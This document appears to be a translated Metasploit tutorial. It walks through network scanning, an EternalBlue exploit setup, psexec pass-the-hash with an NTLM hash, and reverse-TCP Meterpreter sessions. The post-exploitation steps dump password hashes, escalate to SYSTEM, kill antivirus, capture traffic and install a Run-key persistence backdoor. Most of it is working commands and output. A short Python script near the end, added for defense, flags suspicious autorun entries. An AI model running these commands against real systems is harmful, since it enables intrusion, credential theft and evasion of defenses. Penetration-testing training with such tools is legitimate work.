use [auxiliary/exploit/payload/encoder]: select the specified module and start working with it
show [auxiliary/exploit/payload/encoder/options]: list the available modules of a given type, or the options of the current module
set [option/payload]: assign a value to a specific option
setg [option/payload]: assign a value to an option and make it global, so the value is kept when switching between modules
run: launch an auxiliary module once all the options it needs have been set
exploit: launch an exploit module
back: leave the currently selected module and return to the previous command prompt
info: list the information about a module
search: search for modules matching the given criteria
check: check whether a specific target is vulnerable
sessions: list the currently available sessions; sessions -i <id> enters an interactive session
load/unload: load or unload external plugins (scanner commands)
route: add a route, e.g. so that traffic destined for a subnet is sent through a compromised host

```
msf > use auxiliary/scanner/ip/ipidseq
msf auxiliary(ipidseq) > show options
msf auxiliary(ipidseq) > set rhosts 192.168.2.0/24
rhosts => 192.168.2.0/24
msf auxiliary(ipidseq) > set threads 60
threads => 60
msf auxiliary(ipidseq) > run
```
Service scanning

Targeted scanning

1) Server Message Block (SMB) protocol scan

```
msf > use auxiliary/scanner/smb/smb_version
```
2) Searching for misconfigured MSSQL servers

```
msf > use auxiliary/scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > set rhosts 192.168.2.0/24
rhosts => 192.168.2.0/24
msf auxiliary(mssql_ping) > set threads 255
threads => 255
msf auxiliary(mssql_ping) > run
```
3) SSH server scan

```
msf > search ssh_version
```
4) FTP scan

```
msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(ftp_version) > set threads 255
threads => 255
msf auxiliary(ftp_version) > set rhosts 192.168.2.0/24
rhosts => 192.168.2.0/24
msf auxiliary(ftp_version) > run
```
5) Simple Network Management Protocol (SNMP)

```
msf > search snmp_login
```
Vulnerability scanning

MS17-010 vulnerability scan

```
use auxiliary/scanner/smb/smb_ms17_010   # load the vulnerability scanner module
show options                             # view the module's configuration options
set RHOSTS 192.168.1.1-254               # set the scan targets
set THREADS 30                           # set the number of scan threads
run                                      # run the scan
```
Scanning for VNC servers with an empty password. The latest VNC server versions no longer allow empty passwords.

```
msf > use auxiliary/scanner/vnc/vnc_none_auth
```
Exploitation

EternalBlue

```
msf > use exploit/windows/smb/ms17_010_eternalblue   # load the MS17-010 EternalBlue exploit module
msf exploit(windows/smb/ms17_010_eternalblue) > show targets   # list the targets this exploit is valid against
msf exploit(windows/smb/ms17_010_eternalblue) > info   # show detailed information
msf exploit(ms17_010_eternalblue) > setg rhost 192.168.2.5   # set the target 192.168.2.5 as a global variable
rhost => 192.168.2.5
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp   # use a reverse-connection payload
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > set lhost 192.168.2.3   # meterpreter will connect back to 192.168.2.3
lhost => 192.168.2.3
msf exploit(ms17_010_eternalblue) > show options   # review the exploit settings
```
msfdb

Commands for managing the MSF database:

```
msfdb init     # start and initialize the database
msfdb reinit   # delete and reinitialize the database
msfdb delete   # delete database and stop using it
msfdb start    # start the database
msfdb stop     # stop the database
msfdb status   # check service status
msfdb run      # start the database and run msfconsole
```
```
-d <opt>  The directory/drive to begin searching from. Leave empty to search all drives. (Default: )
-f <opt>  A file pattern glob to search for. (e.g. *secret*.doc?)
-h        Help Banner.
-r <opt>  Recursivly search sub directories. (Default: true)
```

```
[*] Enabling Remote Desktop
[*]     RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*]     The Terminal Services service is not set to auto, changing it to auto ...
[*]     Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20180430181213_default_192.168.1.187_host.windows.cle_516653.txt
meterpreter > netstat -ano

Connection list
===============

    Proto  Local address  Remote address  State   User  Inode  PID/Program name
    -----  -------------  --------------  -----   ----  -----  ----------------
    tcp    0.0.0.0:135    0.0.0.0:*       LISTEN  0     0      696/svchost.exe
    tcp    0.0.0.0:445    0.0.0.0:*       LISTEN  0     0      4/System
    tcp    0.0.0.0:3389   0.0.0.0:*       LISTEN  0     0      1040/svchost.exe
```
```
meterpreter > use priv
[-] The 'priv' extension has already been loaded.
meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 24a05299b237d9f48c9eff1c6a88a57e...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
```
```
msf > use exploit/windows/smb/psexec
msf exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOST                                  yes       The target address
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass                                no        The password for the specified username
   SMBUser                                no        The username to authenticate as

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(windows/smb/psexec) > set rhost 192.168.1.187
rhost => 192.168.1.187
msf exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/psexec) > set lhost 192.168.1.130
lhost => 192.168.1.130
msf exploit(windows/smb/psexec) > set lpost 4333
lpost => 4333
msf exploit(windows/smb/psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:db3dd3018cff8541ab7168f899737020
SMBPass => aad3b435b51404eeaad3b435b51404ee:db3dd3018cff8541ab7168f899737020
msf exploit(windows/smb/psexec) > set SMBUser Administrator
SMBUser => Administrator
msf exploit(windows/smb/psexec) > exploit

[*] Started reverse TCP handler on 192.168.1.230:1444
[*] 192.168.1.187:445 - Connecting to the server...
[*] 192.168.1.187:445 - Authenticating to 192.168.1.187:445 as user 'Administrator'...
[*] 192.168.1.187:445 - Selecting PowerShell target
[*] 192.168.1.187:445 - Executing the payload...
[+] 192.168.1.187:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (205891 bytes) to 192.168.1.187
[*] Meterpreter session 1 opened (192.168.1.230:1444 -> 192.168.1.187:49468) at 2018-04-30 18:48:56 -0400

meterpreter >
```
Privilege escalation

```
meterpreter > use priv
[-] The 'priv' extension has already been loaded.
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
WIN-VONVJ6OMEQ7\Administrator

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

AuthID   Package    Domain        User              Password
------   -------    ------        ----              --------
0;996    Negotiate  WORKGROUP     WIN-VONVJ6OMEQ7$
0;46406  NTLM
0;997    Negotiate  NT AUTHORITY  LOCAL SERVICE
0;999    NTLM       WORKGROUP     WIN-VONVJ6OMEQ7$
```
Using scripts

1) vnc

```
meterpreter > run vnc   # start a VNC session on the remote system
[*] Creating a VNC reverse tcp stager: LHOST=192.168.1.230 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\Windows\TEMP\jzoEGmzImp.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.1.230:4545...
```

```
meterpreter > run screen_unlock   # unlock the desktop of the target machine
[!] Meterpreter scripts are deprecated. Try post/windows/escalate/screen_unlock.
[!] Example: run post/windows/escalate/screen_unlock OPTION=value [...]
[*] no working target found
```
```
meterpreter > run post/windows/gather/enum_applications

[*] Enumerating applications installed on WIN-VONVJ6OMEQ7

Installed Applications
======================

 Name                                                          Version
 ----                                                          -------
 2345好压                                                       v5.9
 Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161  9.0.30729.6161
 Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161  9.0.30729.6161
 Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215   14.0.24215.1
 Microsoft Visual C++ 2015 x64 Additional Runtime - 14.0.24215  14.0.24215
 Microsoft Visual C++ 2015 x64 Minimum Runtime - 14.0.24215     14.0.24215
 Python 2.7.13 (64-bit)                                        2.7.13150
 VMware Tools                                                  10.2.0.7259539
```

```
meterpreter > run post/windows/manage/migrate
[*] Running module against WIN-VONVJ6OMEQ7
[*] Current server process: spoolsv.exe (1128)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3592
[+] Successfully migrated to process 3592
meterpreter > getpid
Current pid: 3592
```
4) Disabling antivirus software

```
meterpreter > run killav

[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.
[!] Example: run post/windows/manage/killav OPTION=value [...]
[*] Killing Antivirus services on the target...
```
5) Capturing all traffic on the target host

```
meterpreter > run packetrecorder -i 1
[!] Meterpreter scripts are deprecated. Try post/windows/manage/rpcapd_start.
[!] Example: run post/windows/manage/rpcapd_start OPTION=value [...]
[*] Starting Packet capture on interface 1
[+] Packet capture started
[*] Packets being saved in to /root/.msf4/logs/scripts/packetrecorder/WIN-VONVJ6OMEQ7_20180501.0138/WIN-VONVJ6OMEQ7_20180501.0138.cap
[*] Packet capture interval is 30 Seconds
```
6) Obtaining the password hashes of the target host's system users

```
meterpreter > run hashdump

[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 24a05299b237d9f48c9eff1c6a88a57e...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
```

```
[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-VONVJ6OMEQ7_20180501.2631/WIN-VONVJ6OMEQ7_20180501.2631.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.187 LPORT=443
[*] Persistent agent script is 99671 bytes long
[+] Persistent Script written to C:\Windows\TEMP\ManzZNr.vbs
[*] Executing script C:\Windows\TEMP\ManzZNr.vbs
[+] Agent executed with PID 3852
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\KHNDPfTiTa
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\KHNDPfTiTa
```

Start the connection:

```
msf > use multi/handler
msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.187
lhost => 192.168.1.187
msf exploit(multi/handler) > set lport 443
lport => 443
msf exploit(multi/handler) > exploit
```
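The persistence script above survives reboots only because of the `HKLM\...\CurrentVersion\Run` value it writes, which is exactly what a responder should look for during cleanup. The following is an added defensive example, not code from the original post: it parses a `reg query` dump of the Run key (the listing is constructed here and mimics the entry the script created) and flags autoruns that launch a script or start from a temp directory.

```python
import re

# Constructed sample, mimicking `reg query HKLM\...\Run` output; the KHNDPfTiTa
# entry mirrors the autorun created by the persistence script above.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    VMware User Process    REG_SZ    "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
    KHNDPfTiTa    REG_SZ    C:\Windows\TEMP\ManzZNr.vbs
"""

# reg query separates name / type / data with runs of whitespace.
RUN_KEY_VALUE = re.compile(r"^\s+(?P<name>.+?)\s{2,}(?P<type>REG_\w+)\s{2,}(?P<data>.+?)\s*$")

# Locations a legitimate autorun rarely launches from: user-writable temp dirs.
SUSPICIOUS_DIRS = ("\\windows\\temp\\", "\\appdata\\local\\temp\\", "\\temp\\")
SCRIPT_EXTENSIONS = (".vbs", ".js", ".bat", ".cmd", ".ps1", ".hta")


def parse_run_key(text):
    """Return (name, type, data) tuples for each value line of a reg query dump."""
    entries = []
    for line in text.splitlines():
        m = RUN_KEY_VALUE.match(line)
        if m:
            entries.append((m.group("name"), m.group("type"), m.group("data")))
    return entries


def flag_suspicious(entries):
    """Flag autoruns whose launcher lives in a temp dir or is a script file."""
    findings = []
    for name, _type, data in entries:
        # Take only the executable path: drop surrounding quotes and arguments.
        path = data.strip('"').split('"')[0].lower()
        reasons = []
        if any(d in path for d in SUSPICIOUS_DIRS):
            reasons.append("launches from a temp directory")
        if path.endswith(SCRIPT_EXTENSIONS):
            reasons.append("launcher is a script")
        if reasons:
            findings.append((name, data, "; ".join(reasons)))
    return findings


if __name__ == "__main__":
    for name, data, why in flag_suspicious(parse_run_key(SAMPLE_REG_QUERY)):
        print(f"[!] Run\\{name} -> {data}: {why}")
```

On a live host, feed it the output of `reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run"` (and the HKCU equivalent) instead of the constructed sample.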
8) Listing all post-exploitation modules

Type run post/ and then press Tab:

```
meterpreter > run post/
Display all 207 possibilities? (y or n)
```